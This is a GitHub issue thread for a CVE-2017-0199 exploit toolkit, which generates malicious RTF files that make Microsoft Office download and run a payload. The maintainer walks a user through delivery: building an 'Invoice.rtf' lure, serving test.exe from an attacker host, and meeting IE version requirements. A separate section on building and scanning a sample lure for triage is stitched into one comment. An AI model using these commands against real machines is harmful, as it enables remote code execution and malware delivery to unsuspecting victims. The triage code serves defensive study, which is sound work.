bhdresh / CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy Python script which gives pentesters and security researchers a quick and effective way to test for the Microsoft Office RCE (CVE-2017-0199). It can generate a malicious RTF/PPSX file and deliver a Metasploit / Meterpreter / other payload to the victim without any complex configuration.

Request for help please #58

Open ITLerner opened 7 years ago

ITLerner commented 7 years ago

I am using Kali Linux 2. I generated the RTF file using the command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443 Then I use the command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe to run exploitation mode... When I open test.rtf on a Windows machine I get "Received GET method from 192.168.1.108" twice. The issue is that test.exe is NOT delivered to the Windows machine. Please help me. Thanks

bhdresh commented 6 years ago

I think you missed specifying the port in the -e argument; it should be something like http://192.168.1.100:443/test.exe because the tool is running on 443 and not on 80.


ITLerner commented 6 years ago

Dear bhdresh, I am extremely thankful for your reply. I changed the -e argument exactly as you mentioned. I still have the same issue: receiving "Received GET method from 192.168.1.108" twice (on two lines). I am confused about the HTA. I think the HTA should deliver the payload, but in my case I have not added this. Please help me with how I can add the HTA.

bhdresh commented 6 years ago

I see, let's start with a basic setup then.

Step 1) Generate the RTF using the command below,

python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.1.100/logo.doc

Step 2) Copy test.exe into /tmp

Step 3) Start the toolkit in exploit mode using the following command,

python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.1.100/test.exe -l /tmp/test.exe

Step 4) Open the RTF file on the target.

Note: it was pointed out in the Metasploit thread that the Internet Explorer version should be at least IE10 (rapid7/metasploit-framework#8220 https://github.com/rapid7/metasploit-framework/issues/8220).

Hope this will help :)

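The RTF produced in Step 1 carries the -u URL as an OLE automatic link (a URL moniker) inside the hex blob of the \objdata group; that link is what the target's Office fetches when the document opens, and it is the request the toolkit answers in exploit mode. As an added triage example that is not part of this project or of this thread, the Python below builds a constructed lure with the same structure (the OLE1 header bytes are a simplified stand-in of my own, not the toolkit's output) and a scanner that pulls the link URL back out of the hex and flags the \objautlink plus remote-URL combination. The names build_sample_rtf, extract_link_urls and analyze_rtf are mine; the URL moniker CLSID is the documented constant from MS-OLEDS.

```python
import re
import binascii

# CLSID of the URL Moniker, {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, serialised
# little-endian as it appears inside an OLE link object (MS-OLEDS).
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

# Matches the hex payload of a {\*\objdata ...} group (plain whitespace only).
OBJDATA_RE = re.compile(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)")


def build_sample_rtf(url: str) -> bytes:
    """Constructed sample lure for this demo (not the toolkit's output).

    The OLE1 header is a simplified stand-in; only the URL moniker layout
    (CLSID, 4-byte length, null-terminated UTF-16LE URL) matters to the scanner.
    """
    url_bytes = url.encode("utf-16-le") + b"\x00\x00"
    moniker = URL_MONIKER_CLSID + len(url_bytes).to_bytes(4, "little") + url_bytes
    ole1 = (b"\x01\x05\x00\x00"               # OLE version field (constructed)
            b"\x02\x00\x00\x00"               # format id field (constructed)
            b"\x09\x00\x00\x00OLE2Link\x00"   # class name seen in CVE-2017-0199 lures
            + moniker)
    hexdata = binascii.hexlify(ole1).decode()
    rtf = ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate"
           "{\\*\\objclass Word.Document.8}"
           "{\\*\\objdata " + hexdata + "}}}")
    return rtf.encode("ascii")


def _decode_url(raw: bytes) -> str:
    # In UTF-16LE the second byte of an ASCII character is NUL; otherwise treat as ANSI.
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le", errors="replace").rstrip("\x00")
    return raw.decode("latin-1", errors="replace").rstrip("\x00")


def extract_link_urls(blob: bytes) -> list:
    """Return every URL found behind a URL moniker CLSID in a decoded OLE blob."""
    urls = []
    idx = blob.find(URL_MONIKER_CLSID)
    while idx != -1:
        off = idx + len(URL_MONIKER_CLSID)
        length = int.from_bytes(blob[off:off + 4], "little")
        url = _decode_url(blob[off + 4:off + 4 + length])
        if url:
            urls.append(url)
        idx = blob.find(URL_MONIKER_CLSID, off)
    return urls


def analyze_rtf(data: bytes) -> dict:
    """Flag RTF files whose embedded OLE object auto-links to a remote URL."""
    text = data.decode("latin-1")          # RTF is 7-bit ASCII; latin-1 never fails
    result = {
        "objautlink": "\\objautlink" in text,
        "objupdate": "\\objupdate" in text,
        "urls": [],
    }
    for m in OBJDATA_RE.finditer(text):
        hexstr = re.sub(r"\s+", "", m.group(1))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]           # tolerate a truncated trailing nibble
        try:
            blob = binascii.unhexlify(hexstr)
        except binascii.Error:
            continue
        result["urls"].extend(extract_link_urls(blob))
    remote = any(u.lower().startswith(("http://", "https://")) for u in result["urls"])
    # An auto-updating OLE link to a web URL is the CVE-2017-0199 lure shape.
    result["suspicious"] = result["objautlink"] and remote
    return result


if __name__ == "__main__":
    sample = build_sample_rtf("http://192.168.1.100/logo.doc")
    print(analyze_rtf(sample))
```

Run it against a file with `analyze_rtf(open("Invoice.rtf", "rb").read())`; on the Step 1 output the extracted URL is the one passed to -u, which is why the path (logo.doc or anything else) does not matter as long as the host and port point at the machine running exploit mode. Caveat: in-the-wild lures often break up the \objdata hex with junk control words or split groups, which this plain-whitespace regex will not reassemble; a full RTF tokenizer such as rtfobj handles those.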

ITLerner commented 6 years ago

Thanks again for your time and reply. I did the same as you mentioned. This time I didn't see anything when starting the toolkit in exploit mode, not even "Received GET method from...". I am unable to understand what the logo.doc in the -u argument is...?

bhdresh commented 6 years ago

Are you sure the target is vulnerable and the IE version is 10+?

Regarding your query about the arguments, the image below from README.md should help you understand the flow and the role of the arguments being used:

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg

Thanks.

ITLerner commented 6 years ago

Yes, I am 100% sure. I am testing it on Windows 8.1, IE 11. When I use the -u argument without logo.doc (mentioned at the end of the command) I receive "Received GET method from...", which indicates the system is vulnerable, but my payload is not delivered... If I use the -u argument with logo.doc then I don't receive any response. Please explain what logo.doc is?? I hope you will understand my point and help me. Regards

spadacio commented 6 years ago

What is logo.doc? Can this be used on a remote server, or just locally?